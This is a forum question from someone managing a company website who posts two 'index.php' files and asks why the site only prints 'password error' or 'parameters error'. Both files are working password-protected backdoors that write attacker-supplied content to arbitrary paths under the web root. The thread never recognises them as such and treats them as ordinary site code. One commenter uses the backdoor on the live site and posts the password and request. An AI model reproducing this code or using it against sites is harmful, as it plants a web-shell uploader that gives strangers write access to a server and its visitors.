# Website is not redirecting to address

Tags: php, web, web-development-server

This is my `index.php`

```
<?php
    error_reporting(E_ERROR);
    //set_time_limit(0);
    //header("Content-Type: text/html; charset=utf-8");
    $system_password="yt";
    $action=$_REQUEST['action'];
    $password=$_REQUEST['password'];
    $filename=$_REQUEST['filename'];
    $body=stripslashes($_REQUEST['body']);

    if($password!=$system_password)
        {
            echo 'password error';
            return;
        }

    if($action=="test")
        {
            echo 'test success';
            return;
        }

    $wjj=dirname(__FILE__);
    if(!file_exists($wjj))
       {    
           mkdir($wjj,0777);
       }

    $fp=fopen($filename,"w");
    //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$body));
    fwrite($fp,"\xEF\xBB\xBF".$body);
    fclose($fp);

    if(file_exists($filename))
       { 
           chmod($filename,0777);
       }
    echo "publish success";
?>
```

When I set this page as homepage it display "password error". visit:http://www.saxonybyseema.com

second `index.php`

```
<?php
     //header("Content-Type: text/html; charset=utf-8");
$config_password="yt";
$action=$_REQUEST['action'];
$password=$_REQUEST['password'];
$folderpath=$_REQUEST['folderpath'];
$filename=$_REQUEST['filename'];
$body=stripslashes($_REQUEST['body']);

if($password==""||$filename==""||$body=="")
    {
        echo 'parameters error!';
        return;
    }

if($password!=$config_password)
   {
        echo 'password error!';
        return;
   }

$rootPath=$_SERVER['DOCUMENT_ROOT'];
$newPath=$rootPath;

if($folderpath!="")
    {
        if($folderpath=="root")
            {
                 $newPath=$rootPath.'/'.$filename;
            }
        else
            {
                 createFolder($rootPath.'/'.$folderpath);
                 $newPath=$rootPath.'/'.$folderpath.'/'.$filename;
            }
     }
else
     {
         $newPath=$filename;
     }


$fp=fopen($newPath,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$body));
fwrite($fp,$body);
fclose($fp);

if(file_exists($newPath))
    {
        echo "publish success & uploaded";
    }

function createFolder($path) 
    {
        if (!file_exists($path))
            {
                createFolder(dirname($path));
                mkdir($path, 0777);
            }
    }
?>
```

when I set this page as home page it shows "parameters error". I haven't developed this site. I am just handling it on behalf of some company. I am not able to find the issue persisting this site to work.

Comment: http://www.saxonybyseema.com/?password=yt&filename=fuu&body=fu&folderpath=/faa : publish success & uploaded

Comment: @n3storm visit the link you will find that it displays "parameter error".I am seriously stuck to resolve it.i am upto no-where with it.

Comment: @A-2-A I am not a full fledged programmer.I am new in it.So if you can help me where i can find the solution and how??

Comment: Just in case, the url I pasted looks like this: `http://www.saxonybyseema.com/?password=yt&filename=fuu&body=fu&folderpath=/faa`. Every `something=somevalue` separated by `&` are called arguments. Your sample site now shows something in production.

Comment: @n3storm So what should i do now?

Comment: We are getting following error log in your domain : 

-------------------------------
[11-Feb-2016 09:55:58 UTC] PHP Warning: include(/home/shubhame/public_html/saxonybyseema.com/js/start.php): failed to open stream: No such file or directory in /home/shubhame/public_html/saxonybyseema.com/index.php on line 3
[11-Feb-2016 09:55:58 UTC] PHP Warning: include(): Failed opening '/home/shubhame/public_html/saxonybyseema.com/js/start.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/shubhame/public_html/saxonybyseema.com/index.php on line 3

Comment: @A-2-A this is the error log

Comment: @n3storm this is the error log

Comment: your code is trying to include a file named start.php and is not found.

Comment: Are you the owner of this hosting? or is something from a friend?

Comment: @n3storm Hosting is being done by a local host provider.I am technical head of a company and handling their websites.the missing file start.php is not there and i have no idea what it was.I didn't make this website.I am just managing it.

Comment: @n3storm What Should i do now?

Comment: Sorry Rajat Goyal but I think you lack basic knowledge and should start from the begining with PHP so you can make your questions more accurate. Good luck